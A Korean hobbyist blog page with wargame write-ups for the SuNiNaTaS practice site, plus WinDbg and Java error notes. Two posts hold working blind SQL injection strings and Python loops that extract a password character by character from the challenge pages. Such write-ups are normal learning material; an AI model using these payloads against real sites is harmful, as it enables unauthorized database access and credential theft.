블로그 이미지
ludwings

카테고리

분류 전체보기 (130)
WIN API (22)
워게임 (61)
만든것 (2)
메모 (37)
Total17,890
Today1
Yesterday1

한.. 한달정도 틈틈히 했는데 재밌었다... 처음으로 올클해봣슴 걔꿀!

님들도해보세여 재밋음 저같은 허접도 올클가능! 추천해요 11등!

 

suninatas.com

'워게임 > 기타' 카테고리의 다른 글

suninatas 올클리어~~  (4) 2013.12.27
suninatas 26번  (0) 2013.12.27
suninatas 24 25  (0) 2013.12.19
suninatas 23번 blind sql injection  (0) 2013.12.17
suninatas 22번 blind sql injection  (0) 2013.12.16
b1inder.dothome.co.kr ] Crypto 4  (1) 2013.12.04
Posted by ludwings

댓글을 달아 주세요

  1. 2014.01.10 15:42 신고 QBeom  댓글주소  수정/삭제  댓글쓰기

    이야 빡고수시네 ㄷㄷ

  2. 2014.05.20 11:19 러드윙스  댓글주소  수정/삭제  댓글쓰기

    우와! 멋저요! 나이스 러드윙스님!!!

suninatas 26번

워게임/기타 / 2013. 12. 27. 16:01

푸는데 시간이 생각보다 오래 걸렸는데.  내가 많이 헤맨 이유는 문제를 너무 어렵게 생각했기 때문이다..

알파벳 하나에 치환되는 알파벳하나. 이렇게 하나하나 되어있었는데 내가 생각한건 n 개의 알파벳이 모여서 다른 한개로 치환 된다고 생각해서 시간이 오래 걸렸는데..

점수를 보고 정신차리고 그냥 한글자로 생각하고 풀었다..

 

HINT

1. bpn ; n은 뭔지 알거라고 생각하고.. 맨마지막에 들어가는 알파벳이 e.인 3글자 단어..? the 또는 are..

2. 맨마지막의 ?ee?  ; ee양옆에 같은 알파벳이 들어가는 단어가 과연 얼마나 있을까..

'워게임 > 기타' 카테고리의 다른 글

suninatas 올클리어~~  (4) 2013.12.27
suninatas 26번  (0) 2013.12.27
suninatas 24 25  (0) 2013.12.19
suninatas 23번 blind sql injection  (0) 2013.12.17
suninatas 22번 blind sql injection  (0) 2013.12.16
b1inder.dothome.co.kr ] Crypto 4  (1) 2013.12.04
Posted by ludwings

댓글을 달아 주세요

Windbg 사용, 설정

메모 / 2013. 12. 24. 10:05

1. 설치

2. 심볼 설정

3. 명령어 검색

 

windbg 검색으로 쉽게 설치가능.

 

windbg symbol을 설정해야 분석할때 쉽게 알아볼수 있다.

- http://infoages.tistory.com/1146

 

windbg 명령어 / 계속 추가

 

 

lmvm -> 모듈 정보 확인
u -> un assemble
chkimg -> 변경되었나확인

lm m name
lm a address
-> 모듈 확인

dds - > display dword
dps

!dh -f module -> 헤더 정보

'메모' 카테고리의 다른 글

코드인젝션시 주의사항  (7) 2014.01.10
메모  (0) 2014.01.02
Windbg 사용, 설정  (0) 2013.12.24
JAVA Error occurred during initialization of VM 문제해결  (0) 2013.12.19
메모  (2) 2013.11.28
아나 하이라이터 ㅡㅡ  (0) 2013.11.01
Posted by ludwings

댓글을 달아 주세요

JAVA로 실행시에 아래와 같은 오류가 난다면?

 

Error occurred during initialization of VM
Could not reserve enough space for object heap

 

메세지 그대로 VM 을 초기화시기기위한 heap 영역이 부족한거라고 한다.

 

해결방법 :

 

환경변수를 추가해준다.

시스템 속성 - 고급 - 환경변수 - 새로만들기

 

이름 : _JAVA_OPTIONS

값 : -Xmx512M

 

확인결과 성공햇다!

 

'메모' 카테고리의 다른 글

메모  (0) 2014.01.02
Windbg 사용, 설정  (0) 2013.12.24
JAVA Error occurred during initialization of VM 문제해결  (0) 2013.12.19
메모  (2) 2013.11.28
아나 하이라이터 ㅡㅡ  (0) 2013.11.01
리버싱&해킹공부자료  (1) 2013.10.30
Posted by ludwings

댓글을 달아 주세요

suninatas 24 25

워게임/기타 / 2013. 12. 19. 08:39
처음풀어본 안드로이드문제욧다 첫문제는 .apkㄹㅎ 설치하고 툴들을 이용해서 소스파잏을 파헤쳐소 원하는값을 입룍햐쥬니까 값을뿌려줫는데 두번째문제는 구문오류라고 설치가되지않는ㄴ다. 정석분적해서 원하는 값을 알아낸 후에 useragent를 안드로이드로 전송해랴되나보다

'워게임 > 기타' 카테고리의 다른 글

suninatas 올클리어~~  (4) 2013.12.27
suninatas 26번  (0) 2013.12.27
suninatas 24 25  (0) 2013.12.19
suninatas 23번 blind sql injection  (0) 2013.12.17
suninatas 22번 blind sql injection  (0) 2013.12.16
b1inder.dothome.co.kr ] Crypto 4  (1) 2013.12.04
Posted by ludwings

댓글을 달아 주세요

>>> param = 'v'
>>> num="0123456789"
for i in range(2,9):
 full_param="http://www.suninatas.com/Part_one/web23/web23.asp?id=%27+or%28left%28pw%2C"+num[i]+"%29%3D%27"+param
 for j in range(len(words)):
  tmp = full_param+words[j]+"%27%29--&pw=1"
  resp = opener.open(tmp)
  str = resp.read().decode('utf-8')
  if str.find('OK')>-1:
   param = param+words[j]
   print(words[j])
   break


>>> param=""
>>> for i in range(1,9):
 full_param="http://www.suninatas.com/Part_one/web23/web23.asp?id=%27+or%28right%28pw%2C"+num[i]+"%29%3D%27"
 for j in range(len(words)):
  tmp = full_param+words[j]+param+"%27%29--&pw=1"
  resp = opener.open(tmp)
  str = resp.read().decode('utf-8')
  if str.find('OK')>-1:
   param = words[j]+param
   print(words[j])
   break


오른쪽

 

'워게임 > 기타' 카테고리의 다른 글

suninatas 올클리어~~  (4) 2013.12.27
suninatas 26번  (0) 2013.12.27
suninatas 24 25  (0) 2013.12.19
suninatas 23번 blind sql injection  (0) 2013.12.17
suninatas 22번 blind sql injection  (0) 2013.12.16
b1inder.dothome.co.kr ] Crypto 4  (1) 2013.12.04
Posted by ludwings

댓글을 달아 주세요

admin' and(substring(pw,1,1)='a')--

OK admin


http://www.suninatas.com/Part_one/web22/web22.asp?id=admin' and(substring(pw,1,1)='a')--&pw=1


http://www.suninatas.com/Part_one/web22/web22.asp?id=guest%27+and%28substring%28pw%2C1%2C1%29%3D%27g%27%29--&pw=1

>>> import urllib.request
>>> resp = urllib.request.urlopen("http://www.suninatas.com/member/mem_action.asp?Hid=ludwings&Hpw=")
>>> resp.read()
>>> words = "abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+=-~"
>>> param = "id=admin' and(substring(pw,1,1)='a')--&pw=1"

 

 

====

 

 


1. login session 유지

>>> import http.cookiejar
>>> import urllib.request
>>> import urllib.parse
>>>
>>> cj = http.cookiejar.CookieJar()
>>> opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
>>> resp = opener.open("http://www.suninatas.com/member/mem_action.asp?Hid=ludwings&Hpw=")
>>> print(resp.read())
b'\r\n<script language="javascript">\r\n\tvar auth1 = "1";\r\n\tvar auth  = auth1*1;\r\n\r\n\tif (auth == "0"){\r\n\t\talert("Plese Login First!");\r\n\t\tparent.document.location.href="../member/mem_action.asp?licen=login_out";\r\n\t}else{\r\n\t\talert("Welcome To SuNiNaTaS!");\r\n\t\tparent.document.location.href="../main/main.asp";\r\n\t}\r\n</script>'

 

 

 

 

2. buffer to string
str.decode('utf-8')

 

>>> words = "abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+=-~[]?;:'><.,`/{}"
>>> param1 = 'http://www.suninatas.com/Part_one/web22/web22.asp?id=admin%27+and%28substring%28pw%2C1%2C1%29%3D%27'
>>> param2 = '%27%29--&pw=1'
>>>

admin' and(substring(pw,n,1)=words[i])--


admin' and(substring(pw,1,1)='a')--

N1

N1c3Bilnl


3. 특수문자를 encode 해줘야해..

 

urllib.error.HTTPError: HTTP Error 406: Not Acceptable
>>> words = "abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$^&*()_+-~[]?:'><.,/{}"
>>> numbers="123456789"
>>> for i in range(10):
 for j in range(len(words)):
  full_param = 'http://www.suninatas.com/Part_one/web22/web22.asp?id=admin%27+and%28substring%28pw%2C'+numbers[i]+'%2C1%29%3D%27'+words[j]+param2
  resp = opener.open(full_param)
  str = resp.read()
  str2 = str.decode('utf-8')
  if str2.find('OK')>-1:
   print(words[j])
   break

'워게임 > 기타' 카테고리의 다른 글

suninatas 올클리어~~  (4) 2013.12.27
suninatas 26번  (0) 2013.12.27
suninatas 24 25  (0) 2013.12.19
suninatas 23번 blind sql injection  (0) 2013.12.17
suninatas 22번 blind sql injection  (0) 2013.12.16
b1inder.dothome.co.kr ] Crypto 4  (1) 2013.12.04
Posted by ludwings

댓글을 달아 주세요

이거푸는데 머 어케해야하지 하다가

인터넷에서 봣던

셜록홈즈의 춤추는 사람인가 인형인가 그거로 한번해봤다...

 

EEnpcqNcqNifPetVT sqcqN bdPWuQqgcqNcqNsqDfbdP_KEDeiqg_fsDeinpetKE

이렇게 되어있는데 반복으로 나오는 문자들 각각 한글자를 붙일수있겠지..


EE =
np =
sq =
cqN =
fs =
KE =
Dei =
qg =
et =
P =

 

근데 문자열의 시작은아마 Password Is ~~~일테니까

앞에

EE = P
np = a
sq = i
cqN = s

ifPetVT = word

 

이런식으로 했다..

중간에 _KEDeiqg_ 는 3글자 같은데

 

중간에 저런단어는 for, the, ago 등등 을 찾아볼수있는데 앞에서 한번도 나오지 않은 알파벳만 쓰인

the 같다..

그럼

 

password is ?? essi ??_the_?hart

 

이렇게되는데 힌트가 char니까 맨뒤의 물음표는 C..

저중간 4글자는 사용안된 알파벳

bfgjklnmquvxyz 들중 3개를 뽑아사용할텐데, 모음 알파벳은 u 하나남았으니 두번째 ? 는 u가될 확률이 크다..

그렇다면

?uessi?? 인데... 사용안된 알파벳으로 나올수있는 가장 높은 가능성을 지닌 단어는 "guessing" 이다.

 

 

'워게임 > 기타' 카테고리의 다른 글

suninatas 올클리어~~  (4) 2013.12.27
suninatas 26번  (0) 2013.12.27
suninatas 24 25  (0) 2013.12.19
suninatas 23번 blind sql injection  (0) 2013.12.17
suninatas 22번 blind sql injection  (0) 2013.12.16
b1inder.dothome.co.kr ] Crypto 4  (1) 2013.12.04
Posted by ludwings

댓글을 달아 주세요

  1. 2014.01.16 23:53 우와  댓글주소  수정/삭제  댓글쓰기

    우와신기하네여짝쨕쨕

최근에 달린 댓글

최근에 받은 트랙백

글 보관함